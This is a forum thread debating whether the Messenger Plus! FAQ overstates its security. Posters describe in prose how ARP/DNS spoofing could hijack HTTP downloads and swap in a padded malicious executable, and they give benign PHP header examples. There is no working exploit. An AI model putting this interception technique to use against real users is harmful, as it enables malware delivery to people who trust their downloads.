Shoutbox

Ok, point taken. I still think that saying that it is completely secure is a blatant lie though. Nonetheless I'm reporting the ARP/DNS attack as a bug, along with a sample exploitable situation and a solution. If it is ignored, I'll post it on SecurityFocus and a few other sites and let those guys mull it over. By that time if they don't want to spend time fixing it somebody will exploit it and you can go from there.

quote:

---

Originally posted by Burningmace

2) Even if an attacker discovered that their victim downloaded files regularly from a single site, the task of creating a believable replica of the site in order to fool them is often infeasible with the time frame involved.

---

Using your precious little ARP/DNS spoofing and hijacking all HTTP requests: when you see HTTP response headers from a server that signify a download (Content-Disposition: attachment; etc), block the content of the download and send your own viral code.

Thread moved to Forum & Website since it's regarding a change to the FAQ.

In response to your concerns about getting malware via the auto-update system:

quote:

---

Originally posted by Patchou
As for binaries being downloaded, you may be happy to knwo that I'm not completely stupid and that no exe file downloaded by the auto-update system of Messenger Plus! will be executed if it's not digitally signed by myself.

---

(That was posted in a private forum, so I can't link to it)

That is unlikely to fool anyone. The file size will be completely wrong, the download isn't that easy to catch (content-disposition isn't always set and some sites will have blablabla.exe as their request but will return a content-type of text/plain) and the network load would double (one packet from the user to the attacker, another packet from the attacker to the server), thus slowing down the traffic and alerting the user to a problem.

quote:

---

Originally posted by WDZ
Thread moved to Forum & Website since it's regarding a change to the FAQ.

In response to your concerns about getting malware via the auto-update system:

quote:

---

Originally posted by Patchou
As for binaries being downloaded, you may be happy to knwo that I'm not completely stupid and that no exe file downloaded by the auto-update system of Messenger Plus! will be executed if it's not digitally signed by myself.

---

(That was posted in a private forum, so I can't link to it)

---

Huzzah! In fact now I feel a little stupid for not thinking of that myself.

Nonetheless I still stick by my point that the FAQ is not accurate - there is not 100% guarantee that some exploit (no matter what it is, where it comes from or what medium it uses to get to the client) will not be found. There is no such thing as complete security on a networked system.

quote:

---

Originally posted by Burningmace
No, there is no way Messenger Plus! could have any security flaw that would let non-allowed software to connect on your computer.

---

quote:

---

Originally posted by Burningmace
no matter what it is, where it comes from or what medium it uses to get to the client

---

Plus! won't have a flaw itself that will allow this to happen because it doesn't let those exe's be run if they are not digitally signed. He can't account for any other method of these things coming in, like the http connection. If something comes in that way, it's not a Plus! flaw, but a flaw in whatever it is Plus! is using to connect elsewhere, is it not?

quote:

---

Originally posted by Burningmace
That is unlikely to fool anyone. The file size will be completely wrong.

---

So modify the Content-Length header too?! (or pad out your virus's executable)

quote:

---

Originally posted by Burningmace
the download isn't that easy to catch (content-disposition isn't always set and some sites will have blablabla.exe as their request but will return a content-type of text/plain)

---

... no.

If the Content-Type is text/plain the browser will display the contents in the window and not download it unless the Content-Disposition exists, in which case it will ignore the Content-Type and download it.

http://gifpaste.org/test.php?x=1

code:

---

        header("Content-Type: text/plain");
        header("Content-Disposition: attachment; filename=test.bin");

---

Ignores the text/plain header and prompts the user to download test.bin.

http://gifpaste.org/test.php?x=2

code:

---

        header("Content-Type: application/x-msdownload");

---

Prompts the user to download it using a default filename, so in this rare case you could detect the specific Content-Types related to the downloading of executable files (application/x-msdownload in this case).

http://gifpaste.org/test.php?x=3

code:

---

        header("Content-Type: text/plain");

---

Displays the contents of the file in the browser. In this case you wouldn't hijack the request.

Every website that wants you to download a file will use Content-Disposition if they want the filename to be something that makes sense. This means that Content-Disposition will catch 99% of all HTTP file-download responses.

quote:

---

Originally posted by Burningmace

and the network load would double (one packet from the user to the attacker, another packet from the attacker to the server), thus slowing down the traffic and alerting the user to a problem.

---

Not only is this untrue (the hijacker/attacker modifies the received HTTP packets on the fly, then sends them on, and if they wanted to appear inconspicuous, could even download the original file the user requested) but no normal user would even notice more bandwidth being used.

From the server's perspective, someone is downloading the file requested.

From the user's perspective, they are downloading a file.

You could even take the Content-Length header if you didn't want to rewrite it, and pad out your viral executable with bytes that wouldn't affect its execution so that the browser would report the correct filesize.

quote:

---

Originally posted by .Lou

quote:

---

Originally posted by Burningmace
No, there is no way Messenger Plus! could have any security flaw that would let non-allowed software to connect on your computer.

---

quote:

---

Originally posted by Burningmace
no matter what it is, where it comes from or what medium it uses to get to the client

---

Plus! won't have a flaw itself that will allow this to happen because it doesn't let those exe's be run if they are not digitally signed. He can't account for any other method of these things coming in, like the http connection. If something comes in that way, it's not a Plus! flaw, but a flaw in whatever it is Plus! is using to connect elsewhere, is it not?

---

As I said, I am talking about exploits in a general way. Nothing specific. If xyz vulnerability is found in Plus! and that vulnerability is exploited, the FAQ states blanket security and that is not true. If some hacker uses the exploit to attack a corporate network, they'll look for someone to blame. If they find your FAQ and it says "No, there is no way for you to get hacked through Plus", they'll sue your asses until you're homeless.

quote:

---

Originally posted by Burningmace
If they find your FAQ and it says "No, there is no way for you to get hacked through Plus", they'll sue your asses until you're homeless.

---

Except Patchou doesn't live in lets-just-sue-someone-because-we-cant-think-for-our-selves-land USA, and the FAQ isn't any form of legal document.

The piece of FAQ you quoted is correct. Don't forget this FAQ entry answers the question "Can Messenger Plus! Live open a back door for viruses and trojans?". The question is answered by explaining Messenger Plus! doesn't make any network connections directly (except for mail checking), and by doing so it doesn't add any extra risk on a network level.  You do have a point, but these are all general flaws, nothing specific to Messenger Plus! only.

quote:

---

Originally posted by Burningmace
If they find your FAQ and it says "No, there is no way for you to get hacked through Plus"

---

The FAQ actually doesn't say that anywhere.

Plus! only has the same "security flaws" as any other application which connects to the net whether it be Adobe, Office or a Torrent program for example. The fact is, that if someone has enough time to connect to someone's network, discover the programs and services they use, intercept incoming messages and replace it with their own code, they deserver to be able to send somebody a virus. All that work and what do they have to show for it? The AV software or Anti-Spyware will get rid of it almost instantly and nobody will be worse off. It's kinda like saying your plane is 100% going to be hi-jacked... It's actually a lot of work and very unlikely to happen